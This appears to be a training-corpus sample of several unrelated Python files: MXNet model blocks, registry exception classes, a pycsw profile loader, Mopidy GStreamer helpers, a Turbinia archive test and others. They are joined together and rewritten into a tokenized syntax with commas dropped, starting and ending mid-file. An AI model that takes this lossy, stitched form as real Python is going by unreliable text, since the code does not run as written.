name=name+'_sc_bn')<block_end><block_end><if_stmt>memonger<block_start>shortcut._set_attr(mirror_stage='True')<block_end><return>conv4+shortcut<line_sep>#return bn4 + shortcut #return act4 + shortcut <block_end><def_stmt>block17 net input_num_channels scale=1.0 with_act=<true> act_type='relu' mirror_attr={} name=''<block_start>tower_conv=ConvFactory(net 192 (1 1) name=name+'_conv')<line_sep>tower_conv1_0=ConvFactory(net 129 (1 1) name=name+'_conv1_0')<line_sep>tower_conv1_1=ConvFactory(tower_conv1_0 160 (1 7) pad=(1 2) name=name+'_conv1_1')<line_sep>tower_conv1_2=ConvFactory(tower_conv1_1 192 (7 1) pad=(2 1) name=name+'_conv1_2')<line_sep>tower_mixed=mx.symbol.Concat(*[tower_conv tower_conv1_2])<line_sep>tower_out=ConvFactory(tower_mixed input_num_channels (1 1) with_act=<false> name=name+'_conv_out')<line_sep>net=net+scale<times>tower_out<if_stmt>with_act<block_start>act=mx.symbol.Activation(data=net act_type=act_type attr=mirror_attr)<line_sep><return>act<block_end><else_stmt><block_start><return>net<block_end><block_end><def_stmt>block35 net input_num_channels scale=1.0 with_act=<true> act_type='relu' mirror_attr={} name=''<block_start>M=1.0<line_sep>tower_conv=ConvFactory(net int(input_num_channels<times>0.25<times>M) (1 1) name=name+'_conv')<line_sep>tower_conv1_0=ConvFactory(net int(input_num_channels<times>0.25<times>M) (1 1) name=name+'_conv1_0')<line_sep>tower_conv1_1=ConvFactory(tower_conv1_0 int(input_num_channels<times>0.25<times>M) (3 3) pad=(1 1) name=name+'_conv1_1')<line_sep>tower_conv2_0=ConvFactory(net int(input_num_channels<times>0.25<times>M) (1 1) name=name+'_conv2_0')<line_sep>tower_conv2_1=ConvFactory(tower_conv2_0 int(input_num_channels<times>0.375<times>M) (3 3) pad=(1 1) name=name+'_conv2_1')<line_sep>tower_conv2_2=ConvFactory(tower_conv2_1 int(input_num_channels<times>0.5<times>M) (3 3) pad=(1 1) name=name+'_conv2_2')<line_sep>tower_mixed=mx.symbol.Concat(*[tower_conv tower_conv1_1 tower_conv2_2])<line_sep>tower_out=ConvFactory(tower_mixed input_num_channels (1 1) with_act=<false> name=name+'_conv_out')<line_sep>net=net+scale<times>tower_out<if_stmt>with_act<block_start>act=mx.symbol.Activation(data=net act_type=act_type attr=mirror_attr)<line_sep><return>act<block_end><else_stmt><block_start><return>net<block_end><block_end><def_stmt>conv_inception data num_filter stride dim_match name binarize dcn dilate **kwargs<block_start><assert_stmt><not>binarize<if_stmt>stride[0]<g>1<or><not>dim_match<block_start><return>conv_resnet(data num_filter stride dim_match name binarize dcn dilate **kwargs)<block_end>conv4=block35(data num_filter name=name+'_block35')<line_sep><return>conv4<block_end><def_stmt>conv_cab data num_filter stride dim_match name binarize dcn dilate **kwargs<block_start>workspace=config.workspace<if_stmt>stride[0]<g>1<or><not>dim_match<block_start><return>conv_hpm(data num_filter stride dim_match name binarize dcn dilate **kwargs)<block_end>cab=CAB(data num_filter 1 4 workspace name dilate 1)<line_sep><return>cab.get()<block_end><def_stmt>conv_block data num_filter stride dim_match name binarize dcn dilate<block_start><if_stmt>config.net_block<eq>'resnet'<block_start><return>conv_resnet(data num_filter stride dim_match name binarize dcn dilate)<block_end><elif_stmt>config.net_block<eq>'inception'<block_start><return>conv_inception(data num_filter stride dim_match name binarize dcn dilate)<block_end><elif_stmt>config.net_block<eq>'hpm'<block_start><return>conv_hpm(data num_filter stride dim_match name binarize dcn dilate)<block_end><elif_stmt>config.net_block<eq>'cab'<block_start><return>conv_cab(data num_filter stride dim_match name binarize dcn dilate)<block_end><block_end>#def lin(data, num_filter, workspace, name, binarize, dcn): # bit = 1 # ACT_BIT = config.ACT_BIT # bn_mom = config.bn_mom # workspace = config.workspace # if not binarize: # if not dcn: # conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), # no_bias=True, workspace=workspace, name=name + '_conv') # bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # return act1 # else: # bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1, # num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1)) # conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset, # num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False) # #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1), # # no_bias=False, workspace=workspace, name=name + '_conv') # return conv1 # else: # bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), # no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit) # conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2') # return conv1 <def_stmt>lin3 data num_filter workspace name k g=1 d=1<block_start>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<if_stmt>k<ne>3<block_start>conv1=Conv(data=data num_filter=num_filter kernel=(k k) stride=(1 1) pad=((k-1)<floordiv>2 (k-1)<floordiv>2) num_group=g no_bias=<true> workspace=workspace name=name+'_conv')<block_end><else_stmt><block_start>conv1=Conv(data=data num_filter=num_filter kernel=(k k) stride=(1 1) pad=(d d) num_group=g dilate=(d d) no_bias=<true> workspace=workspace name=name+'_conv')<block_end>bn1=mx.sym.BatchNorm(data=conv1 fix_gamma=<false> momentum=bn_mom eps=2e-5 name=name+'_bn')<line_sep>act1=Act(data=bn1 act_type='relu' name=name+'_relu')<line_sep>ret=act1<line_sep><return>ret<block_end><class_stmt>CAB<block_start><def_stmt>__init__ self data nFilters nModules n workspace name dilate group<block_start>self.data=data<line_sep>self.nFilters=nFilters<line_sep>self.nModules=nModules<line_sep>self.n=n<line_sep>self.workspace=workspace<line_sep>self.name=name<line_sep>self.dilate=dilate<line_sep>self.group=group<line_sep>self.sym_map={}<block_end><def_stmt>get_output self w h<block_start>key=(w h)<if_stmt>key<in>self.sym_map<block_start><return>self.sym_map[key]<block_end>ret=<none><if_stmt>h<eq>self.n<block_start><if_stmt>w<eq>self.n<block_start>ret=(self.data self.nFilters)<block_end><else_stmt><block_start>x=self.get_output(w+1 h)<line_sep>f=int(x[1]<times>0.5)<if_stmt>w<ne>self.n-1<block_start>body=lin3(x[0] f self.workspace "%s_w%d_h%d_1"%(self.name w h) 3 self.group 1)<block_end><else_stmt><block_start>body=lin3(x[0] f self.workspace "%s_w%d_h%d_1"%(self.name w h) 3 self.group self.dilate)<block_end>ret=(body f)<block_end><block_end><else_stmt><block_start>x=self.get_output(w+1 h+1)<line_sep>y=self.get_output(w h+1)<if_stmt>h%2<eq>1<and>h<ne>w<block_start>xbody=lin3(x[0] x[1] self.workspace "%s_w%d_h%d_2"%(self.name w h) 3 x[1])<line_sep>#xbody = xbody+x[0] <block_end><else_stmt><block_start>xbody=x[0]<block_end>#xbody = x[0] #xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1]) <if_stmt>w<eq>0<block_start>ybody=lin3(y[0] y[1] self.workspace "%s_w%d_h%d_3"%(self.name w h) 3 self.group)<block_end><else_stmt><block_start>ybody=y[0]<block_end>ybody=mx.sym.concat(y[0] ybody dim=1)<line_sep>body=mx.sym.add_n(xbody ybody name="%s_w%d_h%d_add"%(self.name w h))<line_sep>body=body/2<line_sep>ret=(body x[1])<block_end>self.sym_map[key]=ret<line_sep><return>ret<block_end><def_stmt>get self<block_start><return>self.get_output(1 1)[0]<block_end><block_end>
<import_stmt>functools<class_stmt>MyBaseException(Exception)<block_start><pass><block_end><class_stmt>SomeException(MyBaseException)<block_start><pass><block_end><class_stmt>TestClass1(object)<block_start>cls_object=25<def_stmt>__init__ self value<block_start>self._value=value<line_sep>self._value2=123<block_end><def_stmt>unsupported_method self<block_start><pass><block_end><def_stmt>print_value self<block_start><return>self._value<block_end><def_stmt>__str__ self<block_start><return>"My str representation is %s"%str(self._value)<block_end><def_stmt>__repr__ self<block_start><return>"My repr representation is %s"%str(self._value)<block_end>@property<def_stmt>value self<block_start><return>self._value<block_end>@value.setter<def_stmt>value self value<block_start>self._value=value<block_end><def_stmt>to_class2 self count stride=1<block_start><return>TestClass2(self._value stride count)<block_end>@staticmethod<def_stmt>somethingstatic val<block_start><return>val+42<block_end>@classmethod<def_stmt>somethingclass cls<block_start><return>cls.cls_object<block_end>@property<def_stmt>override_value self<block_start><return>self._value2<block_end>@override_value.setter<def_stmt>override_value self value<block_start>self._value2=value<block_end><block_end><class_stmt>TestClass2(object)<block_start><def_stmt>__init__ self value stride count<block_start>self._mylist=[value+stride<times>i<for>i range(count)]<block_end><def_stmt>something self val<block_start><return>"In Test2 with %s"%val<block_end><def_stmt>__iter__ self<block_start>self._pos=0<line_sep><return>self<block_end><def_stmt>__next__ self<block_start><if_stmt>self._pos<l>len(self._mylist)<block_start>self._pos<augadd>1<line_sep><return>self._mylist[self._pos-1]<block_end><raise>StopIteration<block_end><block_end><class_stmt>TestClass3(object)<block_start><def_stmt>__init__ self<block_start>print("I am Class3")<block_end><def_stmt>thirdfunction self val<block_start>print("Got value: %s"%val)<line_sep># raise AttributeError("Some weird error") <block_end><def_stmt>raiseSomething self<block_start><raise>SomeException("Something went wrong")<block_end><def_stmt>__hidden self name value<block_start>setattr(self name value)<block_end><def_stmt>weird_indirection self name<block_start><return>functools.partial(self.__hidden name)<block_end><block_end><def_stmt>test_func *args **kwargs<block_start><return>"In test func"<block_end>test_value=1<line_sep>
<import_from_stmt>.expert UpstreamExpert<as>_UpstreamExpert<def_stmt>customized_upstream *args **kwargs<block_start>""" To enable your customized pretrained model, you only need to implement upstream/example/expert.py and leave this file as is. This file is used to register the UpstreamExpert in upstream/example/expert.py The following is a brief introduction of the registration mechanism. The s3prl/hub.py will collect all the entries registered in this file (callable variables without the underscore prefix) as a centralized upstream factory. One can pick up this upstream from the factory via 1. from s3prl.hub import customized_upstream model = customized_upstream(ckpt, model_config) 2. model = torch.hub.load( 'your_s3prl_path', 'customized_upstream', ckpt, model_config, source='local', ) Our run_downstream.py and downstream/runner.py follows the first usage """<line_sep><return>_UpstreamExpert(*args **kwargs)<block_end>
# -*- coding: utf-8 -*- # ================================================================= # # Authors: <NAME> <<EMAIL>> # <NAME> <<EMAIL>> # # Copyright (c) 2015 <NAME> # Copyright (c) 2015 <NAME> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # ================================================================= <import_stmt>os<import_stmt>warnings<class_stmt>Profile(object)<block_start>''' base Profile class '''<def_stmt>__init__ self name version title url namespace typename outputschema prefixes model core_namespaces added_namespaces repository<block_start>''' Initialize profile '''<line_sep>self.name=name<line_sep>self.version=version<line_sep>self.title=title<line_sep>self.url=url<line_sep>self.namespace=namespace<line_sep>self.typename=typename<line_sep>self.outputschema=outputschema<line_sep>self.prefixes=prefixes<line_sep>self.repository=repository<if_stmt>'DescribeRecord'<in>model['operations']<block_start>model['operations']['DescribeRecord']['parameters']['typeName']['values'].append(self.typename)<block_end>model['operations']['GetRecords']['parameters']['outputSchema']['values'].append(self.outputschema)<line_sep>model['operations']['GetRecords']['parameters']['typeNames']['values'].append(self.typename)<line_sep>model['operations']['GetRecordById']['parameters']['outputSchema']['values'].append(self.outputschema)<if_stmt>'Harvest'<in>model['operations']<block_start>model['operations']['Harvest']['parameters']['ResourceType']['values'].append(self.outputschema)<block_end># namespaces core_namespaces.update(added_namespaces)<line_sep># repository model['typenames'][self.typename]=self.repository<block_end><def_stmt>extend_core self model namespaces config<block_start>''' Extend config.model and config.namespaces '''<line_sep><raise>NotImplementedError<block_end><def_stmt>check_parameters self<block_start>''' Perform extra parameters checking. Return dict with keys "locator", "code", "text" or None '''<line_sep><raise>NotImplementedError<block_end><def_stmt>get_extendedcapabilities self<block_start>''' Return ExtendedCapabilities child as lxml.etree.Element '''<line_sep><raise>NotImplementedError<block_end><def_stmt>get_schemacomponents self<block_start>''' Return schema components as lxml.etree.Element list '''<line_sep><raise>NotImplementedError<block_end><def_stmt>check_getdomain self kvp<block_start>'''Perform extra profile specific checks in the GetDomain request'''<line_sep><raise>NotImplementedError<block_end><def_stmt>write_record self result esn outputschema queryables<block_start>''' Return csw:SearchResults child as lxml.etree.Element '''<line_sep><raise>NotImplementedError<block_end><def_stmt>transform2dcmappings self queryables<block_start>''' Transform information model mappings into csw:Record mappings '''<line_sep><raise>NotImplementedError<block_end><block_end><def_stmt>load_profiles path cls profiles<block_start>''' load CSW profiles, return dict by class name '''<def_stmt>look_for_subclass modulename<block_start>module=__import__(modulename)<line_sep>dmod=module.__dict__<for_stmt>modname modulename.split('.')[1:]<block_start>dmod=dmod[modname].__dict__<block_end><for_stmt>key,entry dmod.items()<block_start><if_stmt>key<eq>cls.__name__<block_start><continue><block_end><try_stmt><block_start><if_stmt>issubclass(entry cls)<block_start>aps['plugins'][key]=entry<block_end><block_end><except_stmt>TypeError<block_start><continue><block_end><block_end><block_end>aps={}<line_sep>aps['plugins']={}<line_sep>aps['loaded']={}<for_stmt>prof profiles.split(',')# fgdc, atom, dif, gm03 are supported in core # no need to specify them explicitly anymore # provide deprecation warning # https://github.com/geopython/pycsw/issues/118 <block_start><if_stmt>prof<in>['fgdc' 'atom' 'dif' 'gm03']<block_start>warnings.warn('%s is now a core module, and does not need to be'<concat>' specified explicitly. So you can remove %s from '<concat>'server.profiles'%(prof prof))<block_end><else_stmt><block_start>modulename='%s.%s.%s'%(path.replace(os.sep '.') prof prof)<line_sep>look_for_subclass(modulename)<block_end><block_end><return>aps<block_end>
<import_from_stmt>.pspace PMatDense PMatBlockDiag PMatDiag PMatLowRank PMatImplicit PMatKFAC PMatEKFAC PMatQuasiDiag <import_from_stmt>.vector PVector FVector <import_from_stmt>.fspace FMatDense <import_from_stmt>.map PushForwardDense PushForwardImplicit PullBackDense <line_sep>
<import_stmt>bitmath<class_stmt>V2RegistryException(Exception)<block_start><def_stmt>__init__ self error_code_str message detail http_status_code=400 repository=<none> scopes=<none> is_read_only=<false> <block_start>super(V2RegistryException self).__init__(message)<line_sep>self.http_status_code=http_status_code<line_sep>self.repository=repository<line_sep>self.scopes=scopes<line_sep>self.is_read_only=is_read_only<line_sep>self._error_code_str=error_code_str<line_sep>self._detail=detail<block_end><def_stmt>as_dict self<block_start>error_dict={"code":self._error_code_str "message":str(self) "detail":self._detail<if>self._detail<is><not><none><else>{} }<if_stmt>self.is_read_only<block_start>error_dict["is_readonly"]=<true><block_end><return>error_dict<block_end><block_end><class_stmt>BlobUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(BlobUnknown self).__init__("BLOB_UNKNOWN" "blob unknown to registry" detail 404)<block_end><block_end><class_stmt>BlobUploadInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(BlobUploadInvalid self).__init__("BLOB_UPLOAD_INVALID" "blob upload invalid" detail)<block_end><block_end><class_stmt>BlobUploadUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(BlobUploadUnknown self).__init__("BLOB_UPLOAD_UNKNOWN" "blob upload unknown to registry" detail 404)<block_end><block_end><class_stmt>DigestInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(DigestInvalid self).__init__("DIGEST_INVALID" "provided digest did not match uploaded content" detail)<block_end><block_end><class_stmt>ManifestBlobUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(ManifestBlobUnknown self).__init__("MANIFEST_BLOB_UNKNOWN" "manifest blob unknown to registry" detail)<block_end><block_end><class_stmt>ManifestInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> http_status_code=400<block_start>super(ManifestInvalid self).__init__("MANIFEST_INVALID" "manifest invalid" detail http_status_code)<block_end><block_end><class_stmt>ManifestUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(ManifestUnknown self).__init__("MANIFEST_UNKNOWN" "manifest unknown" detail 404)<block_end><block_end><class_stmt>TagExpired(V2RegistryException)<block_start><def_stmt>__init__ self message=<none> detail=<none><block_start>super(TagExpired self).__init__("TAG_EXPIRED" message<or>"Tag has expired" detail 404)<block_end><block_end><class_stmt>ManifestUnverified(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(ManifestUnverified self).__init__("MANIFEST_UNVERIFIED" "manifest failed signature verification" detail)<block_end><block_end><class_stmt>NameInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> message=<none><block_start>super(NameInvalid self).__init__("NAME_INVALID" message<or>"invalid repository name" detail)<block_end><block_end><class_stmt>NameUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(NameUnknown self).__init__("NAME_UNKNOWN" "repository name not known to registry" detail 404)<block_end><block_end><class_stmt>SizeInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(SizeInvalid self).__init__("SIZE_INVALID" "provided length did not match content length" detail)<block_end><block_end><class_stmt>TagAlreadyExists(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(TagAlreadyExists self).__init__("TAG_ALREADY_EXISTS" "tag was already pushed" detail 409)<block_end><block_end><class_stmt>TagInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(TagInvalid self).__init__("TAG_INVALID" "manifest tag did not match URI" detail)<block_end><block_end><class_stmt>LayerTooLarge(V2RegistryException)<block_start><def_stmt>__init__ self uploaded=<none> max_allowed=<none><block_start>detail={}<line_sep>message="Uploaded blob is larger than allowed by this registry"<if_stmt>uploaded<is><not><none><and>max_allowed<is><not><none><block_start>detail={"reason":"%s is greater than maximum allowed size %s"%(uploaded max_allowed) "max_allowed":max_allowed "uploaded":uploaded }<line_sep>up_str=bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")<line_sep>max_str=bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")<line_sep>message="Uploaded blob of %s is larger than %s allowed by this registry"%(up_str max_str )<block_end><block_end><block_end><class_stmt>Unauthorized(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> repository=<none> scopes=<none><block_start>super(Unauthorized self).__init__("UNAUTHORIZED" "access to the requested resource is not authorized" detail 401 repository=repository scopes=scopes )<block_end><block_end><class_stmt>Unsupported(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> message=<none><block_start>super(Unsupported self).__init__("UNSUPPORTED" message<or>"The operation is unsupported." detail 405)<block_end><block_end><class_stmt>InvalidLogin(V2RegistryException)<block_start><def_stmt>__init__ self message=<none><block_start>super(InvalidLogin self).__init__("UNAUTHORIZED" message<or>"Specified credentials are invalid" {} 401)<block_end><block_end><class_stmt>InvalidRequest(V2RegistryException)<block_start><def_stmt>__init__ self message=<none><block_start>super(InvalidRequest self).__init__("INVALID_REQUEST" message<or>"Invalid request" {} 400)<block_end><block_end><class_stmt>NamespaceDisabled(V2RegistryException)<block_start><def_stmt>__init__ self message=<none><block_start>message=message<or>"This namespace is disabled. Please contact your system administrator."<line_sep>super(NamespaceDisabled self).__init__("DENIED" message {} 405)<block_end><block_end><class_stmt>BlobDownloadGeoBlocked(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>message=("The region from which you are pulling has been geo-ip blocked. "+"Please contact the namespace owner.")<line_sep>super(BlobDownloadGeoBlocked self).__init__("DENIED" message detail 403)<block_end><block_end><class_stmt>ReadOnlyMode(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>message=("System is currently read-only. Pulls will succeed but all write operations "+"are currently suspended.")<line_sep>super(ReadOnlyMode self).__init__("DENIED" message detail 405 is_read_only=<true>)<block_end><block_end>
#! /usr/bin/env python # -*- coding: utf-8 -*- # # author: <NAME> # contact: <EMAIL> # MIT License # Copyright (c) 2020 <NAME> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. <import_stmt>os<import_stmt>tempfile<import_from_stmt>time time<import_stmt>datetime<import_stmt>numpy<as>np<import_stmt>nibabel<as>nib<class_stmt>nib_loader(object)<block_start>""" """<def_stmt>__init__ self<block_start><pass><block_end><def_stmt>load_vol self path<block_start>""" path : patient data path returns numpy array of patient data """<line_sep>self.patient=nib.load(path)<line_sep>self.affine=self.patient.affine<line_sep><return>self.patient.get_data()<block_end><def_stmt>write_vol self path volume<block_start>""" path : path to write the data vol : modifient volume return: True or False based on saving of volume """<try_stmt><block_start>volume=np.uint8(volume)<line_sep>volume=nib.Nifti1Image(volume self.affine)<line_sep>volume.set_data_dtype(np.uint8)<line_sep>nib.save(volume path)<line_sep><return><true><block_end><except_stmt><block_start><return><false><block_end><block_end><block_end>
# terrascript/resource/ddelnano/mikrotik.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:21:43 UTC) <import_stmt>terrascript<class_stmt>mikrotik_bgp_instance(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_bgp_peer(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_dhcp_lease(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_dns_record(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_pool(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_scheduler(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_script(terrascript.Resource)<block_start><pass><block_end>__all__=["mikrotik_bgp_instance" "mikrotik_bgp_peer" "mikrotik_dhcp_lease" "mikrotik_dns_record" "mikrotik_pool" "mikrotik_scheduler" "mikrotik_script" ]<line_sep>
# 执行用时 : 68 ms # 内存消耗 : 16.6 MB # 方案:哨兵结点 sentinel,插入在head结点之前 # Definition for singly-linked list. # class ListNode: # def __init__(self, x): # self.val = x # self.next = None <class_stmt>Solution<block_start><def_stmt>removeElements self head:ListNode val:int<arrow>ListNode# 哨兵结点 sentinel,插入在head结点之前 <block_start>sentinel=ListNode(0)<line_sep>sentinel.next=head<line_sep># 初始化两个指针 curr 和 prev prev,curr=sentinel head<while_stmt>curr<block_start><if_stmt>curr.val<eq>val<block_start>prev.next=curr.next<block_end><else_stmt><block_start>prev=curr<block_end># 遍历下一个元素 curr=curr.next<block_end><return>sentinel.next<block_end><block_end>
<import_from_stmt>mopidy httpclient<import_from_stmt>mopidy.internal.gi Gst<def_stmt>calculate_duration num_samples sample_rate<block_start>"""Determine duration of samples using GStreamer helper for precise math."""<line_sep><return>Gst.util_uint64_scale(num_samples Gst.SECOND sample_rate)<block_end><def_stmt>create_buffer data timestamp=<none> duration=<none><block_start>"""Create a new GStreamer buffer based on provided data. Mainly intended to keep gst imports out of non-audio modules. .. versionchanged:: 2.0 ``capabilites`` argument was removed. """<if_stmt><not>data<block_start><raise>ValueError("Cannot create buffer without data")<block_end>buffer_=Gst.Buffer.new_wrapped(data)<if_stmt>timestamp<is><not><none><block_start>buffer_.pts=timestamp<block_end><if_stmt>duration<is><not><none><block_start>buffer_.duration=duration<block_end><return>buffer_<block_end><def_stmt>millisecond_to_clocktime value<block_start>"""Convert a millisecond time to internal GStreamer time."""<line_sep><return>value<times>Gst.MSECOND<block_end><def_stmt>clocktime_to_millisecond value<block_start>"""Convert an internal GStreamer time to millisecond time."""<line_sep><return>value<floordiv>Gst.MSECOND<block_end><def_stmt>supported_uri_schemes uri_schemes<block_start>"""Determine which URIs we can actually support from provided whitelist. :param uri_schemes: list/set of URIs to check support for. :type uri_schemes: list or set or URI schemes as strings. :rtype: set of URI schemes we can support via this GStreamer install. """<line_sep>supported_schemes=set()<line_sep>registry=Gst.Registry.get()<for_stmt>factory registry.get_feature_list(Gst.ElementFactory)<block_start><for_stmt>uri factory.get_uri_protocols()<block_start><if_stmt>uri<in>uri_schemes<block_start>supported_schemes.add(uri)<block_end><block_end><block_end><return>supported_schemes<block_end><def_stmt>setup_proxy element config<block_start>"""Configure a GStreamer element with proxy settings. :param element: element to setup proxy in. :type element: :class:`Gst.GstElement` :param config: proxy settings to use. :type config: :class:`dict` """<if_stmt><not>hasattr(element.props "proxy")<or><not>config.get("hostname")<block_start><return><block_end>element.set_property("proxy" httpclient.format_proxy(config auth=<false>))<line_sep>element.set_property("proxy-id" config.get("username"))<line_sep>element.set_property("proxy-pw" config.get("password"))<block_end><class_stmt>Signals<block_start>"""Helper for tracking gobject signal registrations"""<def_stmt>__init__ self<block_start>self._ids={}<block_end><def_stmt>connect self element event func *args<block_start>"""Connect a function + args to signal event on an element. Each event may only be handled by one callback in this implementation. """<if_stmt>(element event)<in>self._ids<block_start><raise>AssertionError<block_end>self._ids[(element event)]=element.connect(event func *args)<block_end><def_stmt>disconnect self element event<block_start>"""Disconnect whatever handler we have for an element+event pair. Does nothing it the handler has already been removed. """<line_sep>signal_id=self._ids.pop((element event) <none>)<if_stmt>signal_id<is><not><none><block_start>element.disconnect(signal_id)<block_end><block_end><def_stmt>clear self<block_start>"""Clear all registered signal handlers."""<for_stmt>element,event list(self._ids)<block_start>element.disconnect(self._ids.pop((element event)))<block_end><block_end><block_end>
# -*- coding: utf-8 -*- # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for the Archive processor to compress and decompress folders."""<import_from_future_stmt> unicode_literals<import_stmt>os<import_stmt>tarfile<import_stmt>unittest<import_stmt>tempfile<import_from_stmt>random randint<import_from_stmt>shutil rmtree<import_from_stmt>turbinia.processors archive<import_from_stmt>turbinia TurbiniaException<class_stmt>ArchiveProcessorTest(unittest.TestCase)<block_start>"""Tests for Archive Processor."""<def_stmt>setUp self# Setup testing directories/variables. <block_start>self.test_files=[]<line_sep>self.base_output_dir=tempfile.mkdtemp(prefix='turbinia-test-local')<line_sep>self.tmp_files_dir=os.path.join(self.base_output_dir 'files')<line_sep>self.tmp_archive=os.path.join(self.base_output_dir 'files.tar.gz')<if_stmt><not>os.path.exists(self.tmp_files_dir)<block_start>os.makedirs(self.tmp_files_dir)<block_end># Generate text files containing random numbers. file_max=10<line_sep>counter=0<while_stmt>counter<le>file_max<block_start>file_name='file{0:s}.txt'.format(str(counter))<line_sep>file_path=os.path.join(self.tmp_files_dir file_name)<line_sep>file_open=open(file_path 'w+')<line_sep>rand_nums=[randint(0 1000)<for>i range(50)]<for_stmt>i rand_nums<block_start>file_open.write('%s\n'%str(i))<block_end>file_open.close()<line_sep>counter<augadd>1<line_sep>self.test_files.append(file_name)<block_end>archive.CompressDirectory(self.tmp_files_dir)<block_end><def_stmt>tearDown self# Remove testing directory for this unit test. <block_start><if_stmt>os.path.exists(self.base_output_dir)<block_start>rmtree(self.base_output_dir)<block_end><block_end><def_stmt>test_compressed_dir self<block_start>"""Tests the compression function"""<line_sep># Check if compressed directory matches expected output path. self.assertEqual(archive.CompressDirectory(self.tmp_files_dir) self.tmp_archive)<line_sep># Check to confirm that the archive is gzip format. self.assertEqual(tarfile.is_tarfile(self.tmp_archive) <true>)<line_sep># Raise assertion if folder does not exist. <with_stmt>self.assertRaises(TurbiniaException)<block_start>archive.CompressDirectory('blah')<block_end><block_end><def_stmt>test_validate_tarfile self<block_start>"""Tests the validate function used to decompress tar files"""<line_sep># Raise exception for 